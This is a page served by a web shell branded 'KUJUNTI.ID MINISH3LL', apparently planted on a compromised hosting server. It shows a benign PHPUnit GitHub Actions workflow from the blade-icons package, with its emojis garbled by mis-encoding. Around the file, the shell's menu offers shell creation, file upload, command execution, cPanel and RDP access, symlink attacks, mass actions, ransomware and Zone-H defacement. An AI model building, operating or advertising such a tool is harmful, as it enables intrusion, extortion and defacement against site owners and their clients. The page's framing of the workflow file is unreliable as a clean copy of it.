KUJUNTI.ID MINISH3LL
Path : /var/www/clients/client0/web25/web/vendor/orchid/blade-icons/.github/workflows/
(S)h3ll Cr3at0r :
F!le Upl0ad :

B-Con CMD Config cPanel C-Rdp D-Log Info Jump Mass Ransom Symlink vHost Zone-H

Current File : /var/www/clients/client0/web25/web/vendor/orchid/blade-icons/.github/workflows/phpunit.yml


name: Tests

on: 
  # Run action on every push and PR
  push:
  pull_request:

  # Run action at midnight to test against any updated dependencies
  schedule:
  - cron: '0 0 * * *'

jobs:
  phpunit:
    runs-on: ${{ matrix.os }}
    strategy:
      fail-fast: false
      matrix:
        php: [8.1, 8.0]
        os: [ubuntu-latest, windows-latest]
        laravel: [9.*]
        dependency-version: [prefer-lowest, prefer-stable]
        include:
          - laravel: 9.*
            testbench: 7.*

    name: P${{ matrix.php }} - ${{ matrix.os }} - L${{ matrix.laravel }} - ${{ matrix.dependency-version }}

    steps:
      - name: Checkout code ๐Ÿ›Ž๏ธ
        uses: actions/checkout@v1

      - name: Cache dependencies ๐Ÿ”ง
        uses: actions/cache@v1
        with:
          path: ~/.composer/cache/files
          key: dependencies-laravel-${{ matrix.laravel }}-php-${{ matrix.php }}-composer-${{ hashFiles('composer.json') }}

      - name: Setup PHP ๐Ÿ”ง
        uses: shivammathur/setup-php@v2
        with:
          php-version: ${{ matrix.php }}
          extensions: dom, curl, libxml, mbstring, zip, pcntl, pdo, sqlite, pdo_sqlite, bcmath, soap, intl, gd, exif, iconv, imagick, fileinfo
          coverage: none

      - name: Install dependencies ๐Ÿ”ง
        run: |
          composer update --${{ matrix.dependency-version }} --prefer-dist --no-interaction --no-suggest

      - name: Execute tests (Unit and Feature tests) via PHPUnit ๐Ÿงช
        run: vendor/bin/phpunit --coverage-clover=coverage.xml

ยฉ KUJUNTI.ID

Website Feedback Form

Please fill out the form below to send us your feedback.




Contact Support